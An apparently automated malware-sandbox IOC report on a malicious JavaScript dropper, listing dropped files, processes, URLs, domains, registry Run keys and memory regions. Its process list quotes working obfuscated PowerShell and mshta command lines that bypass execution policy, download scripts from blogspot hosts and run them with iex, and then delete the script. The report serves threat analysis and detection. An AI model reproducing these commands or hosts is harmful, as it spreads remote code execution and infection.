IOC Report
0a0#U00a0.js

loading gif

Files

File Path
Type
Category
Malicious
0a0#U00a0.js
ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_1b13bcbd6a21794da7049b68e35e218e48fee6a_00000000_770fa09e-0f63-403a-ad74-8f7b493fa84d\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_1b13bcbd6a21794da7049b68e35e218e48fee6a_00000000_f8beead5-23bf-46c9-bd19-9eea4c28b5e6\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_cdd7f141287fe4f2bea0fe3446c14e10358859db_00000000_bb7d22c6-b85c-4d76-9feb-9ffa1d6a0e46\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_cdd7f141287fe4f2bea0fe3446c14e10358859db_00000000_de0f10d2-655a-471d-83f3-d519d07b7510\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER43E.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER49C.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CC.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FB.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D5.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER613.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER653.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER654.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\nippleskulcha\oaisjdnlijasndijasndijasmidjamsjd.~!!@@!!@@!@@!!@@!@@!!@@!!~
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\error[1]
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\error[1]
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0l3mb5cm.uhk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hwwx0zx.kzt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cilhall0.l2i.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvoktpkd.mjg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edgkty2p.2jf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enc2153z.eyy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ki3zpz2k.euc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ylvyld20.lse.ps1
ASCII text, with no line terminators
dropped
There are 17 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://11-22hoot.blogspot.com////////////////////lora.pdf);Start-Sleep -Seconds 3;
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
malicious
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\system32\mshta.EXE "javascript:xf=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(xf[2])[xf[0]](xf[1], 0, true);close();mw=new ActiveXObject('Scripting.FileSystemObject');mw.DeleteFile(WScript.ScriptFullName);"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" "javascript:ns=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObje
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" "javascript:ns=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObje
malicious
C:\Windows\System32\mshta.exe
C:\Windows\system32\mshta.EXE "javascript:xf=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(xf[2])[xf[0]](xf[1], 0, true);close();mw=new ActiveXObject('Scripting.FileSystemObject');mw.DeleteFile(WScript.ScriptFullName);"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 804
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 800
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 780
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 804
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 17 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://11-22hoot.blogspot.com////////////////////lora.pdf);Start-Sleep
unknown
malicious
https://hoot22nov.blogspot.com
unknown
malicious
https://hoot22nov.blogspot.com/nipple.pdf)
unknown
malicious
https://11-22hoot.blogspot.com
unknown
malicious
https://hoot22nov.blogspot.com/
unknown
malicious
https://contoso.com/License
unknown
https://www.blogger.com/feeds/71132146144
unknown
https://www.blogger.com/feeds/7113214614470575974/posts/default?alt=atom
unknown
http://hoot22nov.blogspot.com
unknown
https://hoot22nov.blogspot.com/feeds/posts/default
unknown
http://pubsubhubbub.appspot.com/
unknown
http://blogspot.l.googleusercontent.com
unknown
https://hoot22nov.blogspot.com/nipple.pdf
172.217.21.33
https://www.blogger.com/feeds/7113214614470575974R
unknown
http://schemas.google.com/g/2005
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.blogger.com/feeds/71
unknown
https://bitbucket.org/!api/2.0/snippets/chutiyamahi/q7Bo4x/be44a5fed3fe78b384dd1cbea5e223ef1a376ad2/files/hotelnewspam.txt
185.166.143.48
http://schemas.google.com/g/2005#thumbnail
unknown
https://11-22hoot.blogspot.com////////////////////lora.pdfx.
unknown
https://185.196.11.18:7257/6d5f5120d519e2005/hox46u87.3n7nm
unknown
https://11-22hoot.blogspot.com////////////////////lora.pdf
142.250.181.1
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://bitbucket.org
unknown
https://bitbucket.org/
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://www.blogger.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://a9.com/-/spec/opensearchrss/1.0/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://img1.blogblog.com/img/b16-rounded.gif
unknown
https://contoso.com/Icon
unknown
https://hoot22nov.blogspot.com/nipple.pdfX
unknown
https://www.blogger.com/feeds/71132146144&K
unknown
https://github.com/Pester/Pester
unknown
https://hoot22nov.blogspot.com/atom.xml
172.217.21.33
https://www.blogger.com/feeds/7113214614470575974
unknown
http://crl.m
unknown
http://schemas.google.com/blogger/2008
unknown
https://185.196.11.18:7257/6d5f5120d519e2005/hox46u87.3n7nmx
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://aka.ms/pscore68
unknown
http://www.georss.org/georss
unknown
http://www.blogger.com/styles/atom.css
unknown
https://11-22hoot.blogspot.com/atom.xml
142.250.181.1
There are 39 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
11-22hoot.blogspot.com
unknown
malicious
hoot22nov.blogspot.com
unknown
malicious
bitbucket.org
185.166.143.48
blogspot.l.googleusercontent.com
142.250.181.1
s-part-0035.t-0009.t-msedge.net
13.107.246.63
fp2e7a.wpc.phicdn.net
192.229.221.95

IPs

IP
Domain
Country
Malicious
142.250.181.1
blogspot.l.googleusercontent.com
United States
185.166.143.48
bitbucket.org
Germany
172.217.21.33
unknown
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Uplatistarlt-136
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Uplatil-155
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
ExecutionPolicy
HKEY_CURRENT_USER\SOFTWARE\SibCode
sn3
HKEY_CURRENT_USER\SOFTWARE\SibCode
sn3
HKEY_CURRENT_USER_Classes\VirtualStore\MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_CURRENT_USER_Classes\VirtualStore\MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
TickCount
There are 11 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3750000
direct allocation
page execute and read and write
malicious
2FE0000
direct allocation
page read and write
malicious
5180000
direct allocation
page execute and read and write
malicious
161B4D07000
heap
page read and write
1CBBF887000
heap
page read and write
3061000
trusted library allocation
page read and write
2F9D000
trusted library allocation
page read and write
E10000
heap
page read and write
1CBBF860000
heap
page read and write
4D7E000
stack
page read and write
1CBBF87D000
heap
page read and write
1FD31180000
heap
page read and write
1CAA2BB0000
heap
page read and write
1CA88A70000
heap
page read and write
27810210000
trusted library allocation
page read and write
19EE76D0000
heap
page read and write
27802A1C000
trusted library allocation
page read and write
2FF9000
trusted library allocation
page read and write
1CBBF7EF000
heap
page read and write
19EE7CB1000
trusted library allocation
page read and write
1CA88B4C000
heap
page read and write
1350000
heap
page read and write
19EE5C70000
heap
page read and write
19EE5C90000
heap
page read and write
354C000
heap
page read and write
1CA8AC5C000
trusted library allocation
page read and write
1CBBD910000
heap
page read and write
1CBBF860000
heap
page read and write
1CBBF860000
heap
page read and write
DE9000
stack
page read and write
1A00000
trusted library allocation
page read and write
3F81000
trusted library allocation
page read and write
5B23000
unkown
page read and write
2FE9000
trusted library allocation
page read and write
1FD311CE000
heap
page read and write
161B3540000
heap
page read and write
3049000
trusted library allocation
page read and write
27802959000
trusted library allocation
page read and write
161B32E9000
heap
page read and write
1140000
heap
page execute and read and write
20533240000
heap
page read and write
12D34ED1000
heap
page read and write
EE0000
heap
page read and write
1FD32BC0000
heap
page read and write
169B5260000
heap
page readonly
B70000
heap
page read and write
1CBBF86B000
heap
page read and write
1CA8A605000
heap
page read and write
13D0000
heap
page read and write
19EE5C40000
heap
page read and write
5A10000
unkown
page read and write
60B0000
trusted library allocation
page execute and read and write
125324B6000
heap
page read and write
1CA88B3F000
heap
page read and write
2E60000
trusted library allocation
page read and write
161B3320000
heap
page read and write
19EFFE07000
heap
page read and write
1CA88B89000
heap
page read and write
1CBBF802000
heap
page read and write
1CBBF83F000
heap
page read and write
3A819FE000
stack
page read and write
1CA8B5DA000
trusted library allocation
page read and write
9E2338D000
stack
page read and write
1CBBF86B000
heap
page read and write
169B5730000
trusted library allocation
page execute
9C833A2000
stack
page read and write
E20000
heap
page read and write
595F000
stack
page read and write
1CBBF860000
heap
page read and write
161B33CA000
heap
page read and write
9F998FE000
stack
page read and write
1CA8A5A0000
heap
page execute and read and write
305B000
trusted library allocation
page read and write
4D082FD000
stack
page read and write
163D000
heap
page read and write
27800080000
trusted library allocation
page read and write
5A00000
unkown
page read and write
9E0000
heap
page read and write
7B0000
heap
page read and write
1CBBF84A000
heap
page read and write
9F9A88A000
stack
page read and write
19EE863A000
trusted library allocation
page read and write
1592000
trusted library allocation
page execute and read and write
9E221FE000
stack
page read and write
27810252000
trusted library allocation
page read and write
5D3E000
unkown
page read and write
19EE5CDC000
heap
page read and write
1CBBF866000
heap
page read and write
1CA8AC48000
trusted library allocation
page read and write
2FFF000
trusted library allocation
page read and write
A78000
heap
page read and write
1CBBF884000
heap
page read and write
1CBBF871000
heap
page read and write
5E3F000
stack
page read and write
161B4E70000
heap
page read and write
161B332A000
heap
page read and write
14D0000
trusted library allocation
page read and write
9F9A68E000
stack
page read and write
1CBBF875000
heap
page read and write
12D359F4000
heap
page read and write
1CBBF86B000
heap
page read and write
1150000
heap
page read and write
7FFD9B6D0000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
64629FB000
stack
page read and write
1CBBF86B000
heap
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
7FFD9B700000
trusted library allocation
page read and write
1CBBF866000
heap
page read and write
157B000
trusted library allocation
page execute and read and write
2F97000
trusted library allocation
page read and write
9C8498E000
stack
page read and write
7FFD9B790000
trusted library allocation
page read and write
12D342A9000
heap
page read and write
19EFFEC0000
heap
page read and write
12533F4D000
heap
page read and write
1CA8A600000
heap
page read and write
1CBBF860000
heap
page read and write
1CAA2EA8000
heap
page read and write
169B6081000
heap
page read and write
27803E1C000
trusted library allocation
page read and write
161B354E000
heap
page read and write
1CA8B644000
trusted library allocation
page read and write
1CBBF852000
heap
page read and write
1FD30F70000
heap
page read and write
1334000
trusted library allocation
page read and write
14EE000
stack
page read and write
24FB5EF0000
heap
page read and write
3200000
heap
page read and write
1CBBF860000
heap
page read and write
161B3390000
heap
page read and write
30A4000
trusted library allocation
page read and write
2F93000
trusted library allocation
page read and write
1CBBF884000
heap
page read and write
1FD30FCF000
heap
page read and write
2FB5000
trusted library allocation
page read and write
27FE000
stack
page read and write
1CBBF877000
heap
page read and write
374F000
stack
page read and write
12532469000
heap
page read and write
1CAA2E9C000
heap
page read and write
9D5000
heap
page read and write
19EE7BFB000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
E3B000
trusted library allocation
page execute and read and write
19EE7740000
heap
page execute and read and write
1837000
trusted library allocation
page execute and read and write
3037000
trusted library allocation
page read and write
19EE5E80000
heap
page read and write
3B90000
direct allocation
page read and write
6461FFE000
stack
page read and write
9C8387E000
stack
page read and write
57E1000
direct allocation
page execute and read and write
D92000
trusted library allocation
page execute and read and write
7FFD9B566000
trusted library allocation
page execute and read and write
1CBBF88B000
heap
page read and write
14E5000
heap
page read and write
155F000
stack
page read and write
57E3000
direct allocation
page execute and read and write
303D000
trusted library allocation
page read and write
7FFD9B6F0000
trusted library allocation
page read and write
A10000
heap
page read and write
5A00000
unkown
page read and write
1CBBDCDD000
heap
page read and write
5B0F000
stack
page read and write
9E2330A000
stack
page read and write
18C0000
trusted library allocation
page read and write
1CBBD94C000
heap
page read and write
161B3546000
heap
page read and write
19EE866A000
trusted library allocation
page read and write
19EF7BB1000
trusted library allocation
page read and write
19EE864A000
trusted library allocation
page read and write
3087000
trusted library allocation
page read and write
3821000
trusted library allocation
page read and write
2FD0000
heap
page read and write
257B7DAE000
heap
page read and write
1FD311B4000
heap
page read and write
161B4CF4000
heap
page read and write
1CBBF85B000
heap
page read and write
1FD30FBE000
heap
page read and write
DB0000
trusted library allocation
page read and write
12D359F0000
heap
page read and write
9E2257E000
stack
page read and write
1CBBF881000
heap
page read and write
169B6097000
heap
page read and write
1CBBF869000
heap
page read and write
1CBBF86B000
heap
page read and write
7FFD9B484000
trusted library allocation
page read and write
1CA8B5CD000
trusted library allocation
page read and write
1CBBF88E000
heap
page read and write
1CBBF867000
heap
page read and write
4D20000
trusted library allocation
page execute and read and write
1CBBF841000
heap
page read and write
1CBBD900000
heap
page read and write
1340000
trusted library allocation
page read and write
1CBBF887000
heap
page read and write
1CAA2ED2000
heap
page read and write
1CBBF866000
heap
page read and write
E2C000
heap
page read and write
4DA0000
trusted library allocation
page read and write
161B32E0000
heap
page read and write
7FFD9B621000
trusted library allocation
page read and write
9C8377E000
stack
page read and write
1CBBF86B000
heap
page read and write
1CBBF86F000
heap
page read and write
1CBBF880000
heap
page read and write
9C83C7E000
stack
page read and write
7FFD9B750000
trusted library allocation
page read and write
27818A01000
trusted library allocation
page read and write
1CBBF866000
heap
page read and write
1CBBF873000
heap
page read and write
1CBBF860000
heap
page read and write
19EE7CBB000
trusted library allocation
page read and write
9F996FA000
stack
page read and write
24FB61AD000
heap
page read and write
1CA8B63E000
trusted library allocation
page read and write
2FA0000
heap
page read and write
370E000
stack
page read and write
1CBBF860000
heap
page read and write
161B3334000
heap
page read and write
2FDD000
trusted library allocation
page read and write
1130000
trusted library allocation
page read and write
1CBBF849000
heap
page read and write
7FFD9B526000
trusted library allocation
page read and write
24FB61A0000
heap
page read and write
1CBBF802000
heap
page read and write
1CBBDCD9000
heap
page read and write
D44000
trusted library allocation
page read and write
161B3346000
heap
page read and write
9BE000
stack
page read and write
5CDF000
stack
page read and write
9E2320F000
stack
page read and write
7FFD9B473000
trusted library allocation
page execute and read and write
24FB5FA2000
heap
page read and write
2FD5000
trusted library allocation
page read and write
57AE000
stack
page read and write
1CAA2CB4000
heap
page read and write
1CBBF85A000
heap
page read and write
2FF3000
trusted library allocation
page read and write
2FA9000
trusted library allocation
page read and write
278029DF000
trusted library allocation
page read and write
2FFB000
trusted library allocation
page read and write
2F95000
trusted library allocation
page read and write
1CBBF875000
heap
page read and write
1CBBF885000
heap
page read and write
64621FE000
stack
page read and write
7FFD9B652000
trusted library allocation
page read and write
5B3C000
stack
page read and write
29EE000
stack
page read and write
A70000
heap
page read and write
4D40000
trusted library allocation
page read and write
161B339A000
heap
page read and write
1CBBF877000
heap
page read and write
2B2B000
trusted library allocation
page read and write
354C000
heap
page read and write
1CBBF802000
heap
page read and write
3043000
trusted library allocation
page read and write
7FFD9B670000
trusted library allocation
page read and write
1CBBF924000
heap
page read and write
3BE1000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
125324E9000
heap
page read and write
1CBBF852000
heap
page read and write
19EE7CBE000
trusted library allocation
page read and write
1CBBF867000
heap
page read and write
7D0000
heap
page read and write
D43000
trusted library allocation
page execute and read and write
2FF5000
trusted library allocation
page read and write
2F7F000
stack
page read and write
12D359F2000
heap
page read and write
1CBBF882000
heap
page read and write
24FB61A4000
heap
page read and write
156A000
trusted library allocation
page execute and read and write
1CBBF86B000
heap
page read and write
56DE000
stack
page read and write
2FA1000
trusted library allocation
page read and write
3013000
trusted library allocation
page read and write
27802A18000
trusted library allocation
page read and write
1CBBF88B000
heap
page read and write
1CBBF85A000
heap
page read and write
15F8000
heap
page read and write
19EE80C0000
trusted library allocation
page read and write
1CBBDCD0000
heap
page read and write
1CAA2C20000
heap
page read and write
1CBBF85B000
heap
page read and write
12D34ECA000
heap
page read and write
1560000
trusted library allocation
page read and write
305F000
trusted library allocation
page read and write
1CBBF849000
heap
page read and write
1570000
trusted library allocation
page read and write
2FE5000
trusted library allocation
page read and write
1FD30F90000
heap
page read and write
1CBBF884000
heap
page read and write
1CA8B136000
trusted library allocation
page read and write
1CBBF88E000
heap
page read and write
169B55E3000
heap
page read and write
1CBBF85A000
heap
page read and write
125324A4000
heap
page read and write
161B3510000
trusted library allocation
page read and write
169B6088000
heap
page read and write
30DD000
trusted library allocation
page read and write
5AB0000
unkown
page read and write
160D000
heap
page read and write
2FF7000
trusted library allocation
page read and write
E7E000
stack
page read and write
DC0000
heap
page read and write
12D35003000
trusted library allocation
page read and write
5720000
trusted library allocation
page read and write
1CBBF7FF000
heap
page read and write
2D8E000
stack
page read and write
11A0000
heap
page read and write
1CA88B87000
heap
page read and write
7FFD9B48D000
trusted library allocation
page execute and read and write
1CA9AB41000
trusted library allocation
page read and write
1626000
heap
page read and write
7FFD9B590000
trusted library allocation
page execute and read and write
1CA88B00000
heap
page read and write
9D0000
heap
page read and write
7FFD9B6A0000
trusted library allocation
page read and write
1CBBF855000
heap
page read and write
278044F5000
trusted library allocation
page read and write
32FD000
trusted library allocation
page read and write
2F70000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
278107A0000
trusted library allocation
page read and write
1CBBF861000
heap
page read and write
3053000
trusted library allocation
page read and write
1CBBF860000
heap
page read and write
1CBBF888000
heap
page read and write
1CBBF88E000
heap
page read and write
3213000
heap
page read and write
1CAA2E34000
heap
page read and write
257B81B4000
heap
page read and write
2FAD000
trusted library allocation
page read and write
AA8000
heap
page read and write
278105C7000
trusted library allocation
page read and write
4F70000
heap
page execute and read and write
5AD0000
unkown
page read and write
2780341C000
trusted library allocation
page read and write
565E000
stack
page read and write
1CBBF85A000
heap
page read and write
1CBBF852000
heap
page read and write
64626FE000
stack
page read and write
9C8474E000
stack
page read and write
257B7DA9000
heap
page read and write
1CBBF863000
heap
page read and write
1C4854E000
stack
page read and write
ECF000
stack
page read and write
4E4C000
heap
page read and write
169B55E3000
heap
page read and write
3400000
heap
page read and write
278029E2000
trusted library allocation
page read and write
1CBBF900000
heap
page read and write
9E22278000
stack
page read and write
24FB5F99000
heap
page read and write
1CBBF867000
heap
page read and write
1CBBF864000
heap
page read and write
306B000
trusted library allocation
page read and write
1CBBF849000
heap
page read and write
24FB61AE000
heap
page read and write
1822000
trusted library allocation
page execute and read and write
19EE86C7000
trusted library allocation
page read and write
19EE7860000
heap
page read and write
15B0000
heap
page read and write
57E0000
heap
page read and write
12532491000
heap
page read and write
1CAA2E2C000
heap
page read and write
1CBBF87A000
heap
page read and write
1CBBF83F000
heap
page read and write
1CBBF87A000
heap
page read and write
9C833EE000
stack
page read and write
1CBBF87F000
heap
page read and write
1CBBDCDE000
heap
page read and write
DC2000
trusted library allocation
page execute and read and write
19EFFDA0000
heap
page read and write
279F000
stack
page read and write
278110F5000
trusted library allocation
page read and write
12D34ED0000
heap
page read and write
1FD312D0000
trusted library allocation
page read and write
2FCF000
trusted library allocation
page read and write
1CBBF852000
heap
page read and write
3033000
trusted library allocation
page read and write
19EE5D1A000
heap
page read and write
5DDF000
stack
page read and write
D90000
trusted library allocation
page read and write
125324B6000
heap
page read and write
5EDF000
stack
page read and write
9F994FE000
stack
page read and write
161B3344000
heap
page read and write
19EE870A000
trusted library allocation
page read and write
1CA8B648000
trusted library allocation
page read and write
1CBBF884000
heap
page read and write
1CBBF7EB000
heap
page read and write
161B33D1000
heap
page read and write
2FDF000
trusted library allocation
page read and write
169B56D0000
trusted library allocation
page read and write
5B7C000
stack
page read and write
D7F000
stack
page read and write
1CBBF88E000
heap
page read and write
125324EE000
heap
page read and write
169B5470000
heap
page read and write
B78000
heap
page read and write
7FFD9B670000
trusted library allocation
page execute and read and write
2E70000
heap
page execute and read and write
19EF7BC1000
trusted library allocation
page read and write
C0E000
stack
page read and write
1FD30FB4000
heap
page read and write
1CBBF84A000
heap
page read and write
3A818FF000
stack
page read and write
4D60000
direct allocation
page execute and read and write
301F000
trusted library allocation
page read and write
1CBBF85A000
heap
page read and write
257B7D94000
heap
page read and write
5582000
heap
page read and write
E37000
trusted library allocation
page execute and read and write
13A0000
heap
page read and write
7FFD9B480000
trusted library allocation
page read and write
14AE000
stack
page read and write
27812239000
trusted library allocation
page read and write
19EE5EC0000
trusted library allocation
page read and write
183B000
trusted library allocation
page execute and read and write
1CA8AB30000
heap
page read and write
27810011000
trusted library allocation
page read and write
9E21E73000
stack
page read and write
7FFD9B640000
trusted library allocation
page execute and read and write
7FFD9B6E0000
trusted library allocation
page read and write
278044A8000
trusted library allocation
page read and write
19EE7CAE000
trusted library allocation
page read and write
12D34ECC000
heap
page read and write
3500000
heap
page read and write
304D000
trusted library allocation
page read and write
2FC7000
